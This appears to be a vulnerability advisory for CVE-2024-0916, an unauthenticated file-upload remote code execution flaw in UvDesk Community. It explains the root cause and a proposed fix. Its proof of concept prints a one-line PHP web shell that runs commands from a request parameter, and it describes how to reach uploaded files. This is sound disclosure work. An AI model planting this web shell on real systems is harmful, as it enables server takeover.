Unauthenticated Remote Code Execution in UvDesk Community

Apr 25, 2024

CVE Number

CVE-2024-0916

Credits

Melvin Mejia of Pentraze Cybersecurity

Summary

An insecure file upload vulnerability has been found in UvDesk Community version 1.1.3 and prior. The issue resides in the ticket creation process where it allows for files to be uploaded as attachments, said files are not sanitized and are stored in a path where they are accessible to unauthenticated users.

CVSS

10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Details

During the ticket creation process, users can attach files. Unfortunately, the application does not adequately verify the type of files uploaded nor does it sanitize the file names and extensions. As a result, these files are directly accessible and executable via the URL pattern: http://<host>/assets/threads/<ticket_id>/<uploaded_file>. The Ticket ID, which is necessary to construct this URL, is either sent to the user’s email address upon ticket creation or can be deduced through simple brute force methods due to its incremental nature.

PoC

  • Vulnerable upload form:

  • Contents of webshell.php:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  • Demonstration of Code Execution:

Root cause

The vulnerability comes from the following code in UVdesk Core Framework, this is the function used by the support center bundle to upload ticket attachments.

Ref to code: https://github.com/uvdesk/core-framework/blob/864b9ee35202d754d6fb0b73aa80ded749e015f0/FileSystem/UploadManagers/Localhost.php#L78C1-L78C102

The application already has a mechanism to sanitize filenames but for some reason it is not being used at all since this variable’s value defaults to false (see image).

Proposed fix

In a test environment, changing that variable’s value to true is enough to prevent code execution on the server (filename ends up being randomized and the .php extension is stripped from the file). Using the same example file webshell.php this is what I end up with as an attachment.

Requesting said file:

Pull request with the proposed fix: github.com/uvdesk/core-framework/pull/706

Services

Penetration Testing

Proactive assessment using tactics, techniques, and procedures of actual attackers to identify security flaws, incorrect configurations, and vulnerabilities.

Learn more

Application Security Testing

Comprehensive application protection, ensuring robust security throughout the entire software development lifecycle.

Learn more

Red Team Exercises

Simulate and emulate advanced cyber attacks to pinpoint vulnerabilities and test your organization's defense mechanisms, ensuring robust resilience against real-world threats.

Learn more

Vulnerability Management

Proactive process to identify, prioritize, and address security vulnerabilities in systems and software, enhancing an organization's defense against evolving cyber threats.

Learn more